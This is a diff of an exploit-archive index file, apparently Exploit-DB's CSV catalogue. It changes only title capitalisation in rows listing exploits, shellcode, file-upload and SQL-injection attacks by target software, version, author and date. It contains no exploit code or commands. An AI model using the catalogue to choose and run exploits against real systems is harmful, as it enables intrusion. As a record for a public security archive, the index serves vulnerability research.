18832,platforms/php/webapps/18832.txt,"Symantec Web Gateway - Cross-Site Scripting",2012-05-04,B00y@,php,webapps,0 18834,platforms/php/remote/18834.rb,"PHP - CGI Argument Injection",2012-05-04,Metasploit,php,remote,0 18871,platforms/php/webapps/18871.txt,"Travelon Express CMS 6.2.2 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 -18861,platforms/windows/local/18861.php,"PHP 5.4.3 - Code Execution (Win32)",2012-05-11,0in,windows,local,0 +18861,platforms/windows/local/18861.php,"PHP 5.4.3 (Windows/x86) - Code Execution",2012-05-11,0in,windows,local,0 18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0 -18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0 +18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0 18864,platforms/windows/dos/18864.txt,"QNX phrelay/phindows/phditto - Multiple Vulnerabilities",2012-05-11,"Luigi Auriemma",windows,dos,0 18836,platforms/php/remote/18836.py,"PHP < 5.3.12 & < 5.4.2 - CGI Argument Injection Exploit",2012-05-05,rayh4c,php,remote,0 18859,platforms/hardware/webapps/18859.txt,"Belkin N150 Wireless Router - Password Disclosure",2012-05-11,"Avinash Tangirala",hardware,webapps,0 @@ -16397,50 +16397,50 @@ id,file,description,date,author,platform,type,port 18968,platforms/windows/remote/18968.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020006 Buffer Overflow",2012-06-01,Metasploit,windows,remote,0 18964,platforms/windows/dos/18964.txt,"IrfanView 4.33 - Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos,0 18970,platforms/php/webapps/18970.txt,"Membris 2.0.1 - Multiple Vulnerabilities",2012-06-01,Dr.abolalh,php,webapps,0 -18965,platforms/php/webapps/18965.html,"4psa voipnow professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps,0 +18965,platforms/php/webapps/18965.html,"4PSA VoIPNow Professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps,0 18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow",2012-06-01,Metasploit,windows,remote,0 18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 18973,platforms/windows/remote/18973.rb,"GIMP - script-fu Server Buffer Overflow",2012-06-02,Metasploit,windows,remote,0 18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Persistent Cross-Site Scripting",2012-06-02,"Henry Hoggard",php,webapps,0 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 -18987,platforms/php/webapps/18987.php,"WordPress WP-Property Plugin 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 -18988,platforms/php/webapps/18988.php,"WordPress Plugin Marketplace Plugin 1.5.0 < 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 -18989,platforms/php/webapps/18989.php,"WordPress Google Maps via Store Locator Plugin 2.7.1 < 3.0.1 - Multiple Vulnerabilities",2012-06-05,"Sammy FORGIT",php,webapps,0 -18990,platforms/php/webapps/18990.php,"WordPress HTML5 AV Manager Plugin 0.2.7 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 -18991,platforms/php/webapps/18991.php,"WordPress Foxypress Plugin 0.4.1.1 < 0.4.2.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 +18987,platforms/php/webapps/18987.php,"Wordpress WP-Property Plugin 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 +18988,platforms/php/webapps/18988.php,"Wordpress Plugin Marketplace Plugin 1.5.0 < 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 +18989,platforms/php/webapps/18989.php,"Wordpress Google Maps via Store Locator Plugin 2.7.1 < 3.0.1 - Multiple Vulnerabilities",2012-06-05,"Sammy FORGIT",php,webapps,0 +18990,platforms/php/webapps/18990.php,"Wordpress HTML5 AV Manager Plugin 0.2.7 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 +18991,platforms/php/webapps/18991.php,"Wordpress Foxypress Plugin 0.4.1.1 < 0.4.2.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 19027,platforms/windows/remote/19027.rb,"Samsung NET-i viewer - Multiple ActiveX BackupToAvi() Remote Overflow",2012-06-08,Metasploit,windows,remote,0 -18993,platforms/php/webapps/18993.php,"WordPress Asset Manager Plugin 0.2 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 -18994,platforms/php/webapps/18994.php,"WordPress Font Uploader Plugin 1.2.4 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 +18993,platforms/php/webapps/18993.php,"Wordpress Asset Manager Plugin 0.2 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 +18994,platforms/php/webapps/18994.php,"Wordpress Font Uploader Plugin 1.2.4 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 19026,platforms/windows/remote/19026.rb,"Microsoft IIS - MDAC msadcs.dll RDS DataStub Content-Type Overflow",2012-06-08,Metasploit,windows,remote,0 -18997,platforms/php/webapps/18997.php,"WordPress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 -18998,platforms/php/webapps/18998.php,"WordPress Gallery Plugin 3.06 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 +18997,platforms/php/webapps/18997.php,"Wordpress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 +18998,platforms/php/webapps/18998.php,"Wordpress Gallery Plugin 3.06 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18999,platforms/php/webapps/18999.php,"SN News 1.2 - (visualiza.php) SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0 19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service",2012-06-06,Onying,windows,dos,0 -19012,platforms/php/webapps/19012.txt,"WordPress Front File Manager Plugin 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0 -19013,platforms/php/webapps/19013.txt,"WordPress Easy Contact Forms Export Plugin 1.1.0 - Information Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 +19012,platforms/php/webapps/19012.txt,"Wordpress Front File Manager Plugin 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0 +19013,platforms/php/webapps/19013.txt,"Wordpress Easy Contact Forms Export Plugin 1.1.0 - Information Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 19005,platforms/php/webapps/19005.txt,"SN News 1.2 - (/admin/loger.php) Authentication Bypass SQL Injection",2012-06-07,"Yakir Wizman",php,webapps,0 19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - (.PAC) Exploit",2012-06-07,b33f,windows,local,0 19002,platforms/windows/remote/19002.rb,"Microsoft Windows - OLE Object File Handling Remote Code Execution",2012-06-06,Metasploit,windows,remote,0 19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Persistent Cross-Site Scripting",2012-06-06,"Henry Hoggard",php,webapps,0 19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory - Remote Code Execution",2012-06-10,Metasploit,windows,remote,0 19007,platforms/php/webapps/19007.php,"PHPNet 1.8 - (ler.php) SQL Injection",2012-06-07,WhiteCollarGroup,php,webapps,0 -19008,platforms/php/webapps/19008.php,"WordPress Front End Upload 0.5.3 Plugin - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 -19009,platforms/php/webapps/19009.php,"WordPress Omni Secure Files Plugin 0.1.13 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 -19016,platforms/php/webapps/19016.txt,"WordPress PICA Photo Gallery Plugin 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 +19008,platforms/php/webapps/19008.php,"Wordpress Front End Upload 0.5.3 Plugin - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 +19009,platforms/php/webapps/19009.php,"Wordpress Omni Secure Files Plugin 0.1.13 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 +19016,platforms/php/webapps/19016.txt,"Wordpress PICA Photo Gallery Plugin 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 19029,platforms/php/webapps/19029.py,"phpAcounts 0.5.3 - SQL Injection",2012-06-08,loneferret,php,webapps,0 -19018,platforms/php/webapps/19018.txt,"WordPress Plugin: Newsletter 1.5 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 -19019,platforms/php/webapps/19019.php,"WordPress RBX Gallery Plugin 2.1 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps,0 -19020,platforms/php/webapps/19020.txt,"WordPress Simple Download Button Shortcode Plugin 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 -19021,platforms/php/webapps/19021.txt,"WordPress Thinkun Remind Plugin 1.1.3 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 -19022,platforms/php/webapps/19022.txt,"WordPress Tinymce Thumbnail Gallery Plugin 1.0.7 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 -19023,platforms/php/webapps/19023.php,"WordPress wpStoreCart Plugin 2.5.27-2.5.29 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps,0 +19018,platforms/php/webapps/19018.txt,"Wordpress Plugin: Newsletter 1.5 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 +19019,platforms/php/webapps/19019.php,"Wordpress RBX Gallery Plugin 2.1 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps,0 +19020,platforms/php/webapps/19020.txt,"Wordpress Simple Download Button Shortcode Plugin 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 +19021,platforms/php/webapps/19021.txt,"Wordpress Thinkun Remind Plugin 1.1.3 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 +19022,platforms/php/webapps/19022.txt,"Wordpress Tinymce Thumbnail Gallery Plugin 1.0.7 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 +19023,platforms/php/webapps/19023.php,"Wordpress wpStoreCart Plugin 2.5.27-2.5.29 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps,0 19011,platforms/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon - Blind SQL Injection",2012-06-08,"Easy Laster",php,webapps,0 19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - DEBUG",1988-08-01,anonymous,linux,remote,0 19031,platforms/php/webapps/19031.txt,"Webspell dailyinput Movie Addon 4.2.x - SQL Injection",2012-06-10,"Easy Laster",php,webapps,0 19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0 / 7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0 19034,platforms/windows/dos/19034.cpp,"PEamp - (.mp3) Memory Corruption PoC",2012-06-10,Ayrbyte,windows,dos,0 19035,platforms/php/webapps/19035.txt,"freepost 0.1 r1 - Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",php,webapps,0 -19036,platforms/php/webapps/19036.php,"WordPress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0 +19036,platforms/php/webapps/19036.php,"Wordpress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0 19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005)",2012-06-11,Metasploit,windows,local,0 19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 - Arbitrary PHP File Upload",2012-06-10,Metasploit,php,webapps,0 19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd - Buffer Overflow",1988-10-01,anonymous,bsd,remote,0 @@ -16454,15 +16454,15 @@ id,file,description,date,author,platform,type,port 19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0 19048,platforms/aix/remote/19048.txt,"IRIX 6.4 - pfdisplay.cgi",1998-04-07,"J.A. Gutierrez",aix,remote,0 19049,platforms/aix/dos/19049.txt,"BSDI 4.0 tcpmux / inetd - Crash",1998-04-07,"Mark Schaefer",aix,dos,0 -19050,platforms/php/webapps/19050.txt,"WordPress wp-gpx-map 1.1.21 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19050,platforms/php/webapps/19050.txt,"Wordpress wp-gpx-map 1.1.21 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19051,platforms/php/webapps/19051.txt,"ClanSuite 2.9 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 -19052,platforms/php/webapps/19052.txt,"WordPress User Meta 1.1.1 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 -19053,platforms/php/webapps/19053.txt,"WordPress Top Quark Architecture 2.10 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 -19054,platforms/php/webapps/19054.txt,"WordPress SfBrowser 1.4.5 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 -19055,platforms/php/webapps/19055.txt,"WordPress Pica Photo Gallery 1.0 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 -19056,platforms/php/webapps/19056.txt,"WordPress Mac Photo Gallery 2.7 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 -19057,platforms/php/webapps/19057.txt,"WordPress drag and drop file upload 0.1 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 -19058,platforms/php/webapps/19058.txt,"WordPress Custom Content Type Manager 0.9.5.13-pl Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19052,platforms/php/webapps/19052.txt,"Wordpress User Meta 1.1.1 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19053,platforms/php/webapps/19053.txt,"Wordpress Top Quark Architecture 2.10 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19054,platforms/php/webapps/19054.txt,"Wordpress SfBrowser 1.4.5 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19055,platforms/php/webapps/19055.txt,"Wordpress Pica Photo Gallery 1.0 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19056,platforms/php/webapps/19056.txt,"Wordpress Mac Photo Gallery 2.7 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19057,platforms/php/webapps/19057.txt,"Wordpress drag and drop file upload 0.1 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19058,platforms/php/webapps/19058.txt,"Wordpress Custom Content Type Manager 0.9.5.13-pl Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19059,platforms/php/webapps/19059.php,"Agora-Project 2.12.11 - Arbitrary File Upload",2012-06-11,Misa3l,php,webapps,0 19060,platforms/php/webapps/19060.php,"TheBlog 2.0 - Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,php,webapps,0 19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - NETLS_LICENSE_FILE",1996-04-05,"Arthur Hagen",irix,local,0 @@ -16499,7 +16499,7 @@ id,file,description,date,author,platform,type,port 19154,platforms/php/webapps/19154.py,"qdPM 7 - Arbitrary File upload",2012-06-14,loneferret,php,webapps,0 19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 - .M3U Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure",2012-06-13,Metasploit,hardware,remote,0 -19100,platforms/php/webapps/19100.rb,"WordPress Plugin Foxypress - uploadify.php Arbitrary Code Execution",2012-06-13,Metasploit,php,webapps,0 +19100,platforms/php/webapps/19100.rb,"Wordpress Plugin Foxypress - uploadify.php Arbitrary Code Execution",2012-06-13,Metasploit,php,webapps,0 19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0 19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0 19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34 / ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,remote,0 @@ -16512,7 +16512,7 @@ id,file,description,date,author,platform,type,port 19110,platforms/unix/remote/19110.c,"Qualcomm qpopper 2.4 - POP Server Buffer Overflow (2)",1998-06-27,"Miroslaw Grzybek",unix,remote,0 19111,platforms/linux/remote/19111.c,"Multiple OSes - BIND Buffer Overflow (1)",1998-04-08,ROTShB,linux,remote,0 19112,platforms/linux/remote/19112.c,"Multiple OSes - BIND Buffer Overflow (2)",1998-04-08,prym,linux,remote,0 -19113,platforms/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - Telnetd",1999-01-02,"Tomas Halgas",windows,remote,23 +19113,platforms/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - TelnetD",1999-01-02,"Tomas Halgas",windows,remote,23 19386,platforms/php/webapps/19386.txt,"UCCASS 1.8.1 - Blind SQL Injection",2012-06-24,dun,php,webapps,0 19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 - .DJVU Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 19117,platforms/linux/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",linux,dos,0 @@ -16575,7 +16575,7 @@ id,file,description,date,author,platform,type,port 19184,platforms/windows/dos/19184.pl,"Karafun Player 1.20.86 - '.m3u' Crash PoC",2012-06-16,Styxosaurus,windows,dos,0 19185,platforms/hardware/webapps/19185.txt,"Huawei HG866 - Authentication Bypass",2012-06-16,hkm,hardware,webapps,0 19186,platforms/windows/remote/19186.rb,"Microsoft XML Core Services - MSXML Uninitialized Memory Corruption",2012-06-16,Metasploit,windows,remote,0 -19187,platforms/php/webapps/19187.txt,"WordPress Automatic Plugin 2.0.3 - SQL Injection",2012-06-16,nick58,php,webapps,0 +19187,platforms/php/webapps/19187.txt,"Wordpress Automatic Plugin 2.0.3 - SQL Injection",2012-06-16,nick58,php,webapps,0 19188,platforms/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection",2012-06-16,Vulnerability-Lab,php,webapps,0 19189,platforms/php/webapps/19189.txt,"iScripts EasyCreate CMS 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0 19389,platforms/windows/dos/19389.txt,"Kingview Touchview 6.53 - Multiple Heap Overflow Vulnerabilities",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 @@ -16631,7 +16631,7 @@ id,file,description,date,author,platform,type,port 19241,platforms/linux/dos/19241.c,"Linux Kernel 2.2 / 2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options",1999-06-01,"Piotr Wilkin",linux,dos,0 19242,platforms/multiple/remote/19242.txt,"CdomainFree 2.4 - Remote Command Execution",1999-06-01,"Salvatore Sanfilippo -antirez-",multiple,remote,0 19243,platforms/linux/local/19243.txt,"G. Wilford man 2.3.10 - Symlink",1999-06-02,"Thomas Fischbacher",linux,local,0 -19244,platforms/osx/local/19244.sh,"Apple Mac OS X Server 10.0 - Overload",1999-06-03,"Juergen Schmidt",osx,local,0 +19244,platforms/osx/local/19244.sh,"Apple Mac OSX Server 10.0 - Overload",1999-06-03,"Juergen Schmidt",osx,local,0 19245,platforms/windows/remote/19245.pl,"Microsoft IIS 4.0 - Buffer Overflow (1)",1999-06-15,"eEye Digital Security Team",windows,remote,0 19246,platforms/windows/remote/19246.pm,"Microsoft IIS 4.0 - Buffer Overflow (2)",1999-06-15,Stinko,windows,remote,0 19247,platforms/linux/remote/19247.c,"Microsoft IIS 4.0 - Buffer Overflow (3)",1999-06-15,"eeye security",linux,remote,0 @@ -16681,7 +16681,7 @@ id,file,description,date,author,platform,type,port 19291,platforms/windows/remote/19291.rb,"EZHomeTech EzServer 6.4.017 - Stack Buffer Overflow",2012-06-19,Metasploit,windows,remote,0 19292,platforms/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilities",2012-06-19,Vulnerability-Lab,php,webapps,0 19293,platforms/windows/local/19293.py,"Sysax 5.62 - Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0 -19294,platforms/php/webapps/19294.txt,"WordPress Schreikasten 0.14.13 Plugin - Cross-Site Scripting",2012-06-20,"Henry Hoggard",php,webapps,0 +19294,platforms/php/webapps/19294.txt,"Wordpress Schreikasten 0.14.13 Plugin - Cross-Site Scripting",2012-06-20,"Henry Hoggard",php,webapps,0 19295,platforms/windows/remote/19295.rb,"Adobe Flash Player - AVM Verification Logic Array Indexing Code Execution",2012-06-20,Metasploit,windows,remote,0 19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal",1999-11-04,"Ussr Labs",windows,remote,0 19602,platforms/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",linux,local,0 @@ -16774,7 +16774,7 @@ id,file,description,date,author,platform,type,port 19380,platforms/multiple/dos/19380.txt,"Ipswitch IMail 5.0/6.0 - Web Service Buffer Overflow Denial of Service",1999-03-01,"Marc of eEye",multiple,dos,0 19393,platforms/windows/dos/19393.py,"Able2Doc and Able2Doc Professional 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19394,platforms/asp/webapps/19394.txt,"Parodia 6.8 - employer-profile.asp SQL Injection",2012-06-25,"Carlos Mario Penagos Hollmann",asp,webapps,0 -19398,platforms/php/webapps/19398.txt,"WordPress Fancy Gallery Plugin 1.2.4 - Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 +19398,platforms/php/webapps/19398.txt,"Wordpress Fancy Gallery Plugin 1.2.4 - Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 19408,platforms/php/webapps/19408.txt,"Zend Framework - Local File Disclosure",2012-06-27,"SEC Consult",php,webapps,0 19403,platforms/php/webapps/19403.rb,"SugarCRM 6.3.1 - unserialize() PHP Code Execution",2012-06-26,Metasploit,php,webapps,0 29039,platforms/windows/dos/29039.py,"Kerio MailServer 5.x/6.x - Remote LDAP Denial of Service",2006-11-15,"Evgeny Legerov",windows,dos,0 @@ -16845,7 +16845,7 @@ id,file,description,date,author,platform,type,port 19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (1)",1999-08-31,Taeho,unix,remote,0 19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote,0 19480,platforms/multiple/local/19480.c,"ISC INN 2.2 / RedHat Linux 6.0 - inews Buffer Overflow",1999-09-02,bawd,multiple,local,0 -19481,platforms/php/webapps/19481.txt,"WordPress Paid Business Listings 1.0.2 Plugin - Blind SQL Injection",2012-06-30,"Chris Kellum",php,webapps,0 +19481,platforms/php/webapps/19481.txt,"Wordpress Paid Business Listings 1.0.2 Plugin - Blind SQL Injection",2012-06-30,"Chris Kellum",php,webapps,0 19482,platforms/multiple/dos/19482.txt,"GIMP 2.8.0 - .FIT File Format Denial of Service",2012-06-30,"Joseph Sheridan",multiple,dos,0 19483,platforms/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn - Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0 19484,platforms/windows/remote/19484.rb,"HP Data Protector - Create New Folder Buffer Overflow",2012-07-01,Metasploit,windows,remote,3817 @@ -16884,11 +16884,11 @@ id,file,description,date,author,platform,type,port 19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0 19793,platforms/php/webapps/19793.txt,"Magento eCommerce - Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0 19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow",2012-07-01,Metasploit,windows,local,0 -19520,platforms/bsd/remote/19520.txt,"BSD telnetd - Remote Root Exploit",2012-07-01,kingcope,bsd,remote,0 +19520,platforms/bsd/remote/19520.txt,"BSD TelnetD - Remote Root Exploit",2012-07-01,kingcope,bsd,remote,0 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0 19523,platforms/linux/local/19523.txt,"python-wrapper - Untrusted Search Path/Code Execution",2012-07-02,ShadowHatesYou,linux,local,0 -19524,platforms/php/webapps/19524.txt,"WordPress Backup Plugin 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0 +19524,platforms/php/webapps/19524.txt,"Wordpress Backup Plugin 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0 19525,platforms/windows/webapps/19525.txt,"IIS - Short File/Folder Name Disclosure",2012-07-02,"Soroush Dalili",windows,webapps,0 19526,platforms/hardware/webapps/19526.rb,"WANGKONGBAO CNS-1000 UTM IPS-FW - Directory Traversal (Metasploit)",2012-07-02,"Dillon Beresford",hardware,webapps,0 19528,platforms/windows/local/19528.txt,"Microsoft Internet Explorer 4.1/5.0 - Registration Wizard Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 @@ -16909,8 +16909,8 @@ id,file,description,date,author,platform,type,port 19543,platforms/sco/local/19543.c,"SCO Open Server 5.0.5 - cancel Buffer Overflow",1999-10-08,"Brock Tellier",sco,local,0 19544,platforms/linux/local/19544.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (1)",1996-10-25,"Vadim Kolontsov",linux,local,0 19545,platforms/bsd/local/19545.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (2)",1996-10-25,"Vadim Kolontsov",bsd,local,0 -19546,platforms/multiple/local/19546.pl,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 - suidperl Overflow (1)",1997-04-17,"Pavel Kankovsky",multiple,local,0 -19547,platforms/multiple/local/19547.txt,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 - suidperl Overflow (2)",1997-04-17,"Willy Tarreau",multiple,local,0 +19546,platforms/multiple/local/19546.pl,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 SUIDPerl - Overflow Exploit (1)",1997-04-17,"Pavel Kankovsky",multiple,local,0 +19547,platforms/multiple/local/19547.txt,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 SUIDPerl - Overflow Exploit (2)",1997-04-17,"Willy Tarreau",multiple,local,0 19548,platforms/php/webapps/19548.txt,"gp easy CMS Minishop 1.5 Plugin - Persistent Cross-Site Scripting",2012-07-03,"Carlos Mario Penagos Hollmann",php,webapps,0 19549,platforms/php/webapps/19549.txt,"CLscript Classified Script 3.0 - 